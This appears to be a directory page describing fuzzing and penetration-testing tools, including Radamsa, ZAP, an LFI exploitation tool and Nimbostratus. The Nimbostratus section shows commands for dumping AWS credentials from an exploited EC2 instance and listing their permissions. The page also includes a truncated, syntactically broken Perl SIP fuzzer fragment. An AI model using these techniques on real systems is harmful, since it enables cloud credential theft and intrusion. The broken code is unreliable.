Fuzzing

Fuzzing

Radamsa

Radamsa is a test case generator for robustness testing, a.k.a. a fuzzer. It is typically used to test how well a program can withstand malformed and potentially malicious inputs. It works by reading sample files of valid data and generating interestingly different outputs from them. The main selling points of radamsa are that it has already found a slew of bugs in programs that actually matter, it is easily scriptable and easy to get up and running.

Requirements
Supported operating systems:
GNU/Linux
OpenBSD
FreeBSD
Mac OS X
Windows (using Cygwin)

Software requirements for building from sources:
gcc / clang
make
git

SDL MiniFuzz File Fuzzer

SDL MiniFuzz File Fuzzer is a basic file fuzzing tool designed to ease adoption of fuzz testing by non-security developers who are unfamiliar with file fuzzing tools or have never used them in their current software development processes.

System Requirements
Supported Operating System
Windows 7, Windows Vista, Windows XP
• For Visual Studio integration features: Visual Studio 2008
• For Team Foundation Server integration features: Microsoft Team Foundation Server 2008
• For Visual Studio Team System integration features: Microsoft Visual Studio Team System 2008

WebSeekurity

INTRODUCTION

WebSeekurity is a multi-platform tool that can be used to assess the security of Web applications that interact with a server via AMF/SOAP over HTTP. In particular, Adobe Flex applications can be audited thanks to this software.The tool acts as a client that can be used to communicate with the backend server to test. It enables to send requests to this server and to receive the corresponding responses. WebSeekurity attempts to discover and identify potential server-side vulnerabilities: weak authentication and authorization mechanisms, information leakage, vulnerability to SQL injections, etc.Several modes are proposed: Manual, Automatic and Fuzzing. The Manual mode enables to create a request from scratch. The Automatic mode is used to discover the services and methods made available by the application in an automated manner. Finally, fuzzing can be performed thanks to the last mode.WebSeekurity is released under the GNU GPLv2 license.

REQUIREMENTS:
Python 2.7 (not compatible with Python 3.0 or greater)
PyAMF
SOAPpy
pyparsing
Tcl-Tk

lfi-fuzzploit-tool

LFI_Fuzzploit is a simple tool to help in the fuzzing for, finding,and exploiting local file inclusions in Linux based PHP applications. Using special encoding and fuzzing techniques lfi_fuzzploit will scan for some known and some not so known LFI filter bypasses and exploits using some advanced encoding/bypass methods to try to bypass security and achieve its goal which is ultimately, exploiting a Local file inclusion.In addition to LFI_fuzzploit's fuzzing and encoding techniques, it also has built in methods for LFI exploitation including /proc/self/environ shell exploit, File descriptor shell and LFI shell via log injection. LFI_fuzzploit injects code using different command injection functions in the event that certain functions are disabled. Coded by nullbyt3.

Grendel-Scan

A tool for automated security scanning of web applications. Many features are also present for manual penetration testing.

Penetration Testers Framework

Overview:
The PenTesters Framework (PTF) is a Python script designed for Debian/Ubuntu/ArchLinux based distributions to create a similar and familiar distribution for Penetration Testing. As pentesters, we've been accustom to the /pentest/ directories or our own toolsets that we want to keep up-to-date all of the time. We have those "go to" tools that we use on a regular basis, and using the latest and greatest is important.

PTF attempts to install all of your penetration testing tools (latest and greatest), compile them, build them, and make it so that you can install/update your distribution on any machine. Everything is organized in a fashion that is cohesive to the Penetration Testing Execution Standard (PTES) and eliminates a lot of things that are hardly used. PTF simplifies installation and packaging and creates an entire pentest framework for you. Since this is a framework, you can configure and add as you see fit. We commonly see internally developed repos that you can use as well as part of this framework. It's all up to you.

The ultimate goal is for community support on this project. We want new tools added to the github repository. Submit your modules. It's super simple to configure and add them and only takes a few minute.

SIP Army Knife

SIP Army Knife is a fuzzer that searches for cross site scripting, SQL injection, log injection, format strings, buffer overflows, and more.

#!/usr/bin/perl
#SIP VoIP Protocol Fuzzer
#Created: Blake Cornell

use strict;
#use warnings; LOTS OF WARNING ____ SOLVE THIS AND INCREASE EFFICIENTY

use IO::Select;
use IO::Socket;
use IO::Socket::INET;
use Getopt::Long;
use Pod::Usage;
use Time::HiRes qw( alarm );
use Digest::MD4 qw( md4_hex );
use Digest::MD5 qw( md5_hex );
use Digest::CRC qw( crc32 crc16 );
use HTML::Entities;

my @timeoutDetection = ();
my @md5Requests = ();
my @md4Requests = ();
my @crc32Requests = ();
my @crc16Requests = ();
my $packetCount = ;
my $socketType='';
my $result = GetOptions('host|h=s' => \(my $host = ''),
      'dport|p=s' => \(my $dport = ''),
      'sport|p=s' => \(my $sport = ''),
      'verbose|v' => \(my $verbose),
      'veryverbose|vv' => \(my $veryVerbose),
      'connection|c' => \(my $connection), #to listen to response or not
      'density|d=s' => \(my $density = ), #determines how many mutations to use
      'timeout|t=s' => \(my $timeout = .1),
      'count' => \(my $countTests = ), #counts the number of packets to test
      'md4' => \(my $md4), #can cause timeouts
      'md5' => \(my $md5), #can cause timeouts
      'crc32' => \(my $crc32), #can cause timeouts
      'crc16' => \(my $crc16), #can cause timeouts
      'start=s' => \(my $startPosition), #if set, then start at this position
      'stringFormats' => \(my $stringFormats),
      'stringOverflows' => \(my $stringOverflows),
      'integerFormats' => \(my $integerFormats),
      'injectHeaders' => \(my $injectHeaders),
      'xss' => \(my $xss),
      'sqli' => \(my $sqli),
      'callId' => \(my $callId), #call id is incremented
      'detectVersion' => \(my $detectVersion),
      'getOptions' => \(my $getOptions),
      'help' => \(my $help),
      'proto=s' => \(my $proto),

Nimbostratus

Tools for fingerprinting and exploiting Amazon cloud infrastructures. These tools are a PoC which I developed for my "Pivoting in Amazon clouds" talk, developed using the great boto library for accessing Amazon's API.

The nimbostratus toolset is usually used together with nimbostratus-target, which helps you setup a legal environment where this tool can be tested.

Installation
git clone git@github.com:andresriancho/nimbostratus.git
cd nimbostratus
pip install -r requirements.txt

Usage
Providing AWS credentials
Some nimbostratus sub-commands require you to provide AWS credentials. They are provided using the following command line arguments:
--access-key
--secret-key
--token , which is only used when the credentials were extracted from the instance profile.

Dump credentials
Identify the credentials available in this host and prints them out to the console. This is usually the first command to run after gaining access to an EC2 instance.
$ nimbostratus dump-credentials
Found credentials
Access key: ...
Secret key: ...

Once you've got the credentials from an EC2 instance you've exploited, you can continue to work from any other host with internet access (remember: EC2 instances are in many cases spawned for a specific task and then terminated).

IMPORTANT: This will extract information from boto's credential configuration sources and from the instance meta-data. If the system uses other libraries to connect to AWS the credentials won't be dumped.

Dump permissions
This tool will dump all permissions for the provided credentials. This tool is commonly used right after dump-credentials to know which permissions are available for you.
$ nimbostratus dump-permissions --access-key=... --secret-key=...
Starting dump-permissions
These credentials belong to low_privileged_user, not to the root account
Getting access keys for user low_privileged_user
User for key AKIAIV...J6KVA is low_privileged_user

LFI ExplOiter

LFI ExplOiter is an open source penetration testing tool that automates the process of detecting and exploiting Local FIle Inclusion.

Zed Attack Proxy (ZAP)

The Zed Attack Proxy (ZAP) is an easy to use integrated penetration testing tool for finding vulnerabilities in web applications.

It is designed to be used by people with a wide range of security experience and as such is ideal for developers and functional testers who are new to penetration testing.

ZAP provides automated scanners as well as a set of tools that allow you to find security vulnerabilities manually.

Syndicate content